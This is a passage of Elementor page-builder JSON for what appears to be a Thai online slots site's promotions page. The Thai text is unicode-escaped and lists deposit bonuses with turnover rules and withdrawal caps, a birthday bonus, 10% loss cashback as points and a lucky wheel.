\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery 